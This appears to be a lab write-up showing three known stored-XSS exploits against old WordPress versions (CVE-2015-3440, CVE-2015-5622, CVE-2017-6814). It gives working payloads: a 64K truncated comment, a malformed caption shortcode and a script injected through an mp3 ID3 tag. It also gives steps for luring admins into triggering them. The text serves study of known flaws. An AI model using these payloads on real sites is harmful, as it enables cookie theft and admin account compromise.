Each of the following exploits were demonstrated using WPDistillery with a stock image of Wordpress (version 4.2).
This exploit affects Wordpress versions 4.2 and earlier (CVE-2015-3440).
Here we take advantage of the fact that there is 64K limit to the size of a comment. When comments are larger than 64K, it gets truncated. This has to do with the size limits of MySQL text.
So our goal will be to post a visible comment that becomes nefarious upon auto-truncation.
- Post a benign comment(s) that gets approved by an admin so that now we can post our malicious comment without needing approval.
- Post our malicious comment :
<a title='x onmouseover=alert(unescape(/cookies%20yummy/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
- Wait for an admin to view the page =)
Exploit originally discovered by Klikki Oy
This exploit affects WordPress versions 4.2.2 and earlier (CVE-2015-5622).
In this attack we'll use a vulnerability in the WYSIWYG editor and how it processes shortcodes, specifically the caption shortcode. As long as we have access to an account with contributor privileges, we can create a post and use the WYSIWYG editor and submit a post for review by an editor or admin. We can also include style attributes to make the exploit be transparent and cover the whole screen on mouseover.
- Get contributor privileges and create a post.
- Post our malicious shortcode in the WYSIWYG editor:
<a href="[caption code=">]</a><a title=" onmouseover=alert('cookies_yum') ">link</a>
- Submit draft for review and wait for privileged user to open. =)
Exploit originally discovered by Klikki Oy
This exploit affects WordPress versions 3.6.0 to 4.7.2 (CVE-2017-6814)
In this attack we take advantage of Wordpress not sanitizing ID3 tag information on audio files when uploaded by an editor or admin.
- Edit an mp3's title tag to:
Artist_Name - Song_Name </noscript><script>alert(document.cookie);</script>
- Get an editor or admin to upload the malicious mp3. (The mp3 will be indiscernible to the naked eye.)
i) As a contributor you can post and insert a playlist shortcode, then get an editor or admin to upload a malicious mp3. If they will insert it into the playlist, then you're done.
ii) Otherwise we just need to get the mp3 file uploaded and we can figure out the attachment id (ie enumerate the attachment pages) and insert it into a new post using something like:
[playlist ids="52"]
- As soon as an admin or editor uploads it and adds it to the playlist, the exploit will be effective.
Exploit originally discovered at The Summer of Pwnage